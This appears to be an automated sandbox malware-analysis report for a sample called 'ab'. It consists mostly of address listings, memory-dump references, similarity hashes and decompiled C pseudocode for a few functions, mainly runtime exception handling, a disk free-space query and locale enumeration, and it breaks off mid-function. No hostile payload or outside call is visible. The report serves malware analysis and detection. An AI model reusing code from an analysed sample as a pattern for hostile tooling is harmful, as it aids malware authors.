0x012fe5ec
0x00000000
0x012fe5ec
0x012fe5e6
0x012fe5d8
0x012fe606
0x00000000
0x00000000
0x012fe613
0x012fe615
0x012fe618
0x012fe61b
0x012fe622
0x012fe624
0x012fe627
0x012fe62b
0x012fe62e
0x012fe630
0x012fe634
0x012fe637
0x012fe63a
0x012fe63d
0x012fe640
0x012fe647
0x012fe64e
0x012fe651
0x012fe653
0x012fe697
0x012fe697
0x012fe69a
0x012fe69d
0x012fe6a0
0x012fe6a2
0x012fe6ac
0x012fe6b1
0x012fe6b3
0x012fe6b6
0x012fe6d1
0x012fe6d4
0x012fe6b8
0x012fe6b8
0x012fe6bc
0x012fe6bf
0x012fe6c4
0x012fe6c7
0x012fe6cc
0x012fe6cc
0x012fe6d7
0x012fe6de
0x012fe6e1
0x012fe6e3
0x012fe8ad
0x012fe6e9
0x012fe6e9
0x012fe6eb
0x012fe6eb
0x012fe6ee
0x012fe6f0
0x012fe6f8
0x012fe6ff
0x012fe706
0x00000000
0x012fe706
0x00000000
0x012fe655
0x012fe655
0x012fe657
0x012fe65a
0x012fe65d
0x012fe662
0x00000000
0x012fe668
0x012fe668
0x012fe66c
0x012fe671
0x012fe674
0x012fe676
0x012fe679
0x012fe67d
0x012fe680
0x012fe683
0x012fe686
0x012fe691
0x012fe694
0x00000000
0x012fe694
0x012fe662
0x00000000
0x00000000
0x012fe817
0x012fe817
0x00000000
0x00000000
0x012fe715
0x012fe718
0x012fe71b
0x012fe71d
0x012fe720
0x012fe723
0x012fe726
0x012fe729
0x012fe70d
0x012fe70d
0x012fe730
0x012fe730
0x012fe730
0x012fe733
0x012fe734
0x012fe73b
0x012fe73e
0x012fe741
0x012fe743
0x012fe745
0x012fe748
0x012fe74d
0x012fe750
0x012fe750
0x012fe755
0x012fe755
0x00000000
0x00000000
0x012fe75c
0x012fe760
0x012fe763
0x012fe766
0x012fe772
0x012fe772
0x012fe775
0x012fe778
0x012fe77d
0x012fe77f
0x012fe782
0x012fe785
0x012fe788
0x012fe78a
0x012fe78d
0x012fe792
0x012fe795
0x012fe797
0x012fe79a
0x00000000
0x012fe768
0x012fe768
0x012fe76c
0x00000000
0x00000000
0x012fe76c
0x00000000
0x00000000
0x012fe7a3
0x012fe7a6
0x012fe7a9
0x012fe7ae
0x012fe7b1
0x012fe7b4
0x012fe7b7
0x012fe7bf
0x012fe7c1
0x012fe7c3
0x012fe5cb
0x012fe5cb
0x00000000
0x012fe7c9
0x012fe7c9
0x012fe7cc
0x012fe7cf
0x012fe7d1
0x012fe7d4
0x012fe7d6
0x012fe7d9
0x012fe7db
0x012fe5c9
0x012fe5c9
0x00000000
0x012fe7e1
0x012fe7e5
0x012fe7ec
0x012fe7f0
0x012fe5bc
0x012fe5bc
0x012fe5be
0x012fe5c1
0x012fe5c3
0x012fe8b5
0x012fe8b5
0x012fe8b9
0x012fe8b9
0x00000000
0x00000000
0x00000000
0x00000000
0x012fe5c3
0x012fe7db
0x00000000
0x00000000
0x012fe7fb
0x012fe7fd
0x00000000
0x00000000
0x012fe81e
0x012fe821
0x012fe823
0x012fe825
0x012fe82e
0x00000000
0x00000000
0x012fe835
0x012fe838
0x012fe83c
0x012fe83e
0x012fe847
0x012fe84a
0x012fe84c
0x012fe84e
0x012fe855
0x012fe802
0x012fe802
0x012fe805
0x012fe807
0x012fe80c
0x012fe80f
0x012fe80f
0x012fe812
0x012fe814
0x012fe814
0x00000000
0x00000000
0x012fe85c
0x012fe863
0x012fe86c
0x012fe86c
0x012fe870
0x012fe885
0x012fe885
0x012fe889
0x012fe896
0x012fe897
0x012fe89a
0x012fe89f
0x012fe88b
0x012fe88b
0x012fe88d
0x012fe892
0x012fe894
0x00000000
0x00000000
0x012fe894
0x012fe8a3
0x012fe8a6
0x012fe872
0x012fe872
0x012fe874
0x012fe877
0x00000000
0x00000000
0x00000000
0x00000000
0x012fe877
0x012fe865
0x012fe865
0x012fe868
0x012fe86a
0x012fe879
0x012fe879
0x012fe87b
0x012fe87d
0x00000000
0x00000000
0x00000000
0x012fe86a
0x00000000
0x00000000
0x012fe514
0x012fe8ea
0x012fe8ec
0x00000000
0x012fe8ec
0x012fe4ec
0x012fe4ec
0x012fe4ed
0x012fe4f2
0x00000000
0x00000000
0x00000000
0x00000000
0x012fe4f2
0x012fe4d9
0x012fe4d9
0x012fe4da
0x012fe4df
0x012fe8f1
0x012fe8f1
0x012fe8f3
0x012fe8f8
0x012fe8f8
0x012fe8fa
0x012fe8ff
0x012fe8ff
0x012fe904
0x012fe905
0x012fe907
0x012fe909
0x012fe90b
0x012fe90e
0x012fe90f
0x012fe912
0x012fe913
0x012fe916
0x012fe917
0x012fe91d
0x012fe921
0x012fe925
0x012fe927
0x012fe929
0x012fe92b
0x012fe92d
0x012fe92f
0x012fe931
0x012fe936
0x012fe937
0x012fe93b
0x012fe941
0x012fe945
0x012fe947
0x012fe949
0x012fe94e
0x012fe951
0x012fe953
0x012fe959
0x012fe95a
0x012fe95b
0x012fe95c
0x012fe95d
0x012fe95e
0x012fe95f
0x012fe963
0x00000000
0x00000000
0x00000000
0x012fe4df
0x00000000

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 012FE8FF

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: c3dfc04e3a40ab8db81c6b8c695c982a5815d8373127760440b86f8d5dbc007a
Instruction ID: cbcdadfd1f2a434bd277a842bc9b9fdda6888650ccd6b6ee3628fa072cfcaed1
Opcode Fuzzy Hash: c3dfc04e3a40ab8db81c6b8c695c982a5815d8373127760440b86f8d5dbc007a
Instruction Fuzzy Hash: 56E1A171A20616DFDB16DF68C494AADFBB2FF48310F16452DD612AB3A1E730E851CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01358C8F, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E01358C8F(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E013592C5(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E01359231(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x01358c9d
0x01358ca4
0x01358ca9
0x01358caf
0x01358cb2
0x01358cb8
0x01358cbd
0x01358cc2
0x01358cc2
0x01358cc8
0x01358ccd
0x01358cd2
0x01358cd2
0x01358cd9
0x01358cde
0x01358ce3
0x01358ce3
0x01358cea
0x01358cef
0x01358cf4
0x01358cf4
0x01358cfb
0x01358d00
0x01358d05
0x01358d05
0x01358d0d
0x01358d1d
0x01358d2f
0x01358d41
0x01358d54
0x01358d66
0x01358d6e
0x01358d73
0x01358d78
0x01358d78
0x01358d7f
0x01358d84
0x01358d84
0x01358d8b
0x01358d90
0x01358d90
0x01358d97
0x01358d9c
0x01358d9c
0x01358da3
0x01358da8
0x01358da8
0x01358db2
0x01358db4
0x01358dee
0x01358db6
0x01358dbb
0x01358ddf
0x01358de7
0x01358ddb
0x01358ddb
0x01358df1
0x01358df8
0x01358dfa
0x01358e1c
0x01358e24
0x01358e27
0x01358e27
0x01358e29
0x01358e29
0x01358e34
0x01358e3a
0x01358e3f
0x01358e46
0x01358e80
0x01358e8b
0x01358e91
0x01358e94
0x01358e97
0x01358ea3
0x01358eab
0x01358e48
0x01358e4b
0x01358e57
0x01358e5d
0x01358e63
0x01358e66
0x01358e6f
0x01358e6f
0x01358eae
0x01358ebc
0x01358ec2
0x01358ec5
0x01358eca
0x01358ecc
0x01358ecf
0x01358ecf
0x01358ed4
0x01358ed6
0x01358ed9
0x01358ed9
0x01358ede
0x01358ee0
0x01358ee3
0x01358ee3
0x01358ee8
0x01358eea
0x01358eed
0x01358eed
0x01358ef2
0x01358ef4
0x01358ef4
0x01358f01
0x01358f04
0x01358f3b
0x01358f06
0x01358f06
0x01358f09
0x01358f34
0x01358f29
0x01358f29
0x01358f3d
0x01358f45
0x01358f48
0x01358f67
0x01358f6c
0x01358f6c
0x01358f6e
0x01358f73
0x01358f7f
0x01358f75
0x01358f78
0x01358f78
0x01358f84
0x01358f84
0x01358f4a
0x01358f4d
0x01358f5c
0x00000000
0x01358f5c
0x01358f4f
0x01358f52
0x01358f54
0x01358f54
0x00000000
0x01358f52
0x01358f0b
0x01358f0e
0x01358f24
0x00000000
0x01358f24
0x01358f13
0x01358f15
0x01358f15
0x01358f13
0x00000000
0x01358f04
0x01358e01
0x01358e0f
0x01358e17
0x00000000
0x01358e17
0x01358e05
0x01358e0a
0x01358e0a
0x00000000
0x01358e05
0x01358dc2
0x01358dd0
0x01358dd8
0x00000000
0x01358dd8
0x01358dc6
0x01358dcb
0x01358dcb
0x01358dc6

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 01358EBC

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 0495d2365ff5521e47954c51c1428bbd8a0f41bf0fbe42d6c988625158e3eeeb
Instruction ID: 5eb4eab7442cada14364bb92b0d7c39b1903c9b7c89d650b49e0c24908795891
Opcode Fuzzy Hash: 0495d2365ff5521e47954c51c1428bbd8a0f41bf0fbe42d6c988625158e3eeeb
Instruction Fuzzy Hash: DBB15A31210608DFEB55CF2DC486E657BE1FF49768F258698E99ACF2A1C335E981CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01312230, Relevance: 1.7, APIs: 1, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E01312230(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v8;
				char _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v44;
				long _v48;
				long _v52;
				long _v56;
				long _v60;
				short _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				long _v84;
				char _v100;
				intOrPtr* _v104;
				signed int _v108;
				char _v128;
				void* __esi;
				void* __ebp;
				signed int _t105;
				signed int _t106;
				intOrPtr _t110;
				intOrPtr _t114;
				signed int _t116;
				signed int _t123;
				signed int _t127;
				intOrPtr _t130;
				signed int _t134;
				intOrPtr* _t139;
				void* _t141;
				intOrPtr _t149;
				signed int _t159;
				signed int _t162;
				intOrPtr* _t171;
				unsigned int _t172;
				unsigned int _t175;
				intOrPtr* _t177;
				signed int _t178;
				void* _t179;
				short* _t180;
				signed int _t181;
				void* _t182;
				void* _t183;

				_t141 = __ebx;
				_push(0xffffffff);
				_push(0x1367bc5);
				_push( *[fs:0x0]);
				_t183 = _t182 - 0x70;
				_t105 =  *0x13a4018; // 0x39cca9f6
				_t106 = _t105 ^ _t181;
				_v20 = _t106;
				_push(__edi);
				_push(_t106);
				 *[fs:0x0] =  &_v16;
				_v104 = __ecx;
				_t171 = _a4;
				_t177 = _a8;
				asm("xorps xmm0, xmm0");
				_v84 = 0;
				_v80 = 7;
				_v100 = 0;
				asm("movlpd [ebp-0x48], xmm0");
				_v68 = 0;
				_v8 = 0;
				if( &_v100 == _t171) {
					L4:
					_t110 = _a12;
					asm("xorps xmm0, xmm0");
					_v68 = _t110;
					asm("movlpd [ebp-0x48], xmm0");
					_v56 = 0;
					_v52 = 0;
					_v60 = 0;
					_v48 = 0;
					_v28 = 0;
					_v24 = 7;
					_v44 = 0;
					_v8 = 1;
					if(_t110 != 1) {
						if(_t110 == 2 &&  &_v44 != _t177) {
							_t130 =  *((intOrPtr*)(_t177 + 0x10));
							if( *((intOrPtr*)(_t177 + 0x14)) >= 8) {
								_t177 =  *_t177;
							}
							_push(_t130);
							E012F51B0(_t141,  &_v44, _t171, _t177, _t177);
						}
					} else {
						_push(L":\\");
						_t180 = E012FC400(_t141,  &_v128, _t171, _t171);
						_t183 = _t183 + 4;
						if( &_v44 != _t180) {
							_t159 = _v24;
							if(_t159 >= 8) {
								_push(2 + _t159 * 2);
								E012F56A0(_t141, _t171, _v44);
								_t183 = _t183 + 8;
							}
							_v28 = 0;
							_v24 = 7;
							_v44 = 0;
							asm("movups xmm0, [esi]");
							asm("movups [ebp-0x28], xmm0");
							asm("movq xmm0, [esi+0x10]");
							asm("movq [ebp-0x18], xmm0");
							 *((intOrPtr*)(_t180 + 0x10)) = 0;
							 *(_t180 + 0x14) = 7;
							 *_t180 = 0;
						}
						_t134 = _v108;
						if(_t134 >= 8) {
							_push(2 + _t134 * 2);
							E012F56A0(_t141, _t171, _v128);
							_t183 = _t183 + 8;
						}
					}
					_t112 =  >=  ? _v44 :  &_v44;
					if(GetDiskFreeSpaceW( >=  ? _v44 :  &_v44,  &_v56,  &_v52,  &_v60,  &_v48) == 0) {
						_t172 = _v72;
						_t162 = _v76;
					} else {
						_t123 = _v48;
						_t127 = _t123 * _v52;
						_t175 = (_t123 * _v52 >> 0x20) * _v56 + (_t127 * _v56 >> 0x20);
						_t162 = (_t175 << 0x00000020 | _t127 * _v56) >> 0x1e;
						_t172 = _t175 >> 0x1e;
						_v76 = _t162;
						_v72 = _t172;
					}
					_t149 =  *_v104;
					_v104 = _t149;
					_t114 =  *((intOrPtr*)(_t149 + 4));
					if(_t114 ==  *((intOrPtr*)(_t149 + 8))) {
						E01314930(_t141, _t149, _t114,  &_v100);
						_t178 = _v80;
					} else {
						asm("movups xmm0, [ebp-0x60]");
						_t178 = 7;
						_v100 = 0;
						asm("movups [eax], xmm0");
						asm("movq xmm0, [ebp-0x50]");
						asm("movq [eax+0x10], xmm0");
						 *(_t114 + 0x18) = _t162;
						 *(_t114 + 0x1c) = _t172;
						 *((intOrPtr*)(_t114 + 0x20)) = _a12;
						 *((intOrPtr*)(_v104 + 4)) =  *((intOrPtr*)(_v104 + 4)) + 0x28;
					}
					_t116 = _v24;
					if(_t116 >= 8) {
						_push(2 + _t116 * 2);
						E012F56A0(_t141, _t172, _v44);
						_t183 = _t183 + 8;
					}
					_v28 = 0;
					_v24 = 7;
					_v44 = 0;
					if(_t178 >= 8) {
						_push(2 + _t178 * 2);
						E012F56A0(_t141, _t172, _v100);
					}
					 *[fs:0x0] = _v16;
					_pop(_t179);
					return E0132EA79(_v20 ^ _t181, _t179);
				}
				_t139 = _t171;
				if( *((intOrPtr*)(_t171 + 0x14)) >= 8) {
					_t139 =  *_t171;
				}
				_push( *((intOrPtr*)(_t171 + 0x10)));
				E012F51B0(_t141,  &_v100, _t171, _t177, _t139);
				goto L4;
			}

0x01312230
0x01312233
0x01312235
0x01312240
0x01312241
0x01312244
0x01312249
0x0131224b
0x0131224f
0x01312250
0x01312254
0x0131225a
0x0131225d
0x01312262
0x01312265
0x01312268
0x0131226f
0x01312276
0x0131227a
0x0131227f
0x01312282
0x0131228a
0x013122a2
0x013122a2
0x013122a5
0x013122aa
0x013122ad
0x013122b2
0x013122b9
0x013122c0
0x013122c7
0x013122ce
0x013122d5
0x013122dc
0x013122e0
0x013122e7
0x01312375
0x01312382
0x01312385
0x01312387
0x01312387
0x01312389
0x0131238e
0x0131238e
0x013122ed
0x013122ed
0x013122fc
0x013122fe
0x01312306
0x01312308
0x0131230e
0x01312317
0x0131231b
0x01312320
0x01312320
0x01312323
0x0131232c
0x01312333
0x01312337
0x0131233a
0x0131233e
0x01312343
0x01312348
0x0131234b
0x01312352
0x01312352
0x01312355
0x0131235b
0x01312364
0x01312368
0x0131236d
0x0131236d
0x0131235b
0x013123a9
0x013123b7
0x013123e0
0x013123e3
0x013123b9
0x013123b9
0x013123c8
0x013123cd
0x013123d1
0x013123d5
0x013123d8
0x013123db
0x013123db
0x013123e9
0x013123eb
0x013123ee
0x013123f4
0x0131242c
0x01312431
0x013123f6
0x013123f6
0x013123fc
0x01312401
0x01312408
0x0131240b
0x01312410
0x01312415
0x0131241b
0x0131241e
0x01312421
0x01312421
0x01312434
0x0131243a
0x01312443
0x01312447
0x0131244c
0x0131244c
0x01312451
0x01312458
0x0131245f
0x01312466
0x0131246f
0x01312473
0x01312478
0x0131247e
0x01312487
0x01312495
0x01312495
0x01312290
0x01312292
0x01312294
0x01312294
0x01312296
0x0131229d
0x00000000

APIs

GetDiskFreeSpaceW.KERNEL32(?,00000000,00000000,00000000,00000000,39CCA9F6,?,00000000), ref: 013123AF

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: e7512af1bbd57bae6df0a79961eeaea1459de05111e5f9b11af7cf25e690a2ad
Instruction ID: 2a5790b587ae120f16d4f74a302631aff6c552d95782837dbe63752c04d37472
Opcode Fuzzy Hash: e7512af1bbd57bae6df0a79961eeaea1459de05111e5f9b11af7cf25e690a2ad
Instruction Fuzzy Hash: 11814A71D10209DFDB14CFA8D884AEEFBB5FF58318F64462AE405B7254E774AA84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0135E571, Relevance: 1.6, APIs: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E0135E571(void* __ecx, void* __edx, void* __eflags, signed int* _a4) {
				void* __ebp;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t32;
				signed char _t33;
				signed char _t34;
				intOrPtr* _t38;
				intOrPtr* _t41;
				signed int _t47;
				void* _t50;
				void* _t51;
				signed int* _t52;
				void* _t53;
				signed int _t62;

				_t53 = E013559E0(__ecx, __edx);
				_t47 = 2;
				_t38 =  *((intOrPtr*)(_t53 + 0x50));
				_t50 = _t38 + 2;
				do {
					_t26 =  *_t38;
					_t38 = _t38 + _t47;
				} while (_t26 != 0);
				_t41 =  *((intOrPtr*)(_t53 + 0x54));
				 *(_t53 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
				_t51 = _t41 + 2;
				do {
					_t29 =  *_t41;
					_t41 = _t41 + _t47;
				} while (_t29 != 0);
				_t52 = _a4;
				 *(_t53 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
				_t52[1] = 0;
				if( *(_t53 + 0x60) == 0) {
					_t47 = E0135E66B( *((intOrPtr*)(_t53 + 0x50)));
				}
				 *(_t53 + 0x5c) = _t47;
				_t32 = EnumSystemLocalesW(0x135e697, 1);
				_t62 =  *_t52 & 0x00000007;
				asm("bt ecx, 0x9");
				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
				asm("bt ecx, 0x8");
				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
					 *_t52 = 0;
					return _t34;
				}
				return _t34;
			}

0x0135e57e
0x0135e584
0x0135e585
0x0135e588
0x0135e58b
0x0135e58b
0x0135e58e
0x0135e590
0x0135e59e
0x0135e5a4
0x0135e5a7
0x0135e5aa
0x0135e5aa
0x0135e5ad
0x0135e5af
0x0135e5b8
0x0135e5c3
0x0135e5c6
0x0135e5cc
0x0135e5d7
0x0135e5d7
0x0135e5e0
0x0135e5e3
0x0135e5eb
0x0135e5f1
0x0135e5f5
0x0135e5fa
0x0135e5fe
0x0135e603
0x0135e605
0x00000000
0x0135e605
0x0135e60b

APIs

Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83

EnumSystemLocalesW.KERNEL32(0135E697,00000001,00000000,?,-00000050,?,0135ECC5,00000000,?,?,?,00000055,?), ref: 0135E5E3

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c4390155d611f5b7fc53e71ee8c00b248d5beeb6ea737055e11ee2d676625b9d
Instruction ID: 7a94b481ad8bf001853e19b212323dd23432895f6763c9a6339010793431912f
Opcode Fuzzy Hash: c4390155d611f5b7fc53e71ee8c00b248d5beeb6ea737055e11ee2d676625b9d
Instruction Fuzzy Hash: FD11063B2007059FDB189F39C89197ABBA2FB80B6DB15483CD94687A00E371B602C740

Uniqueness

Uniqueness Score: -1.00%

Function 01311F20, Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E01311F20(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v28;
				char _v44;
				intOrPtr _v48;
				void* __esi;
				signed int _t22;
				signed int _t23;
				intOrPtr _t31;
				intOrPtr _t46;
				void* _t47;
				signed int _t48;

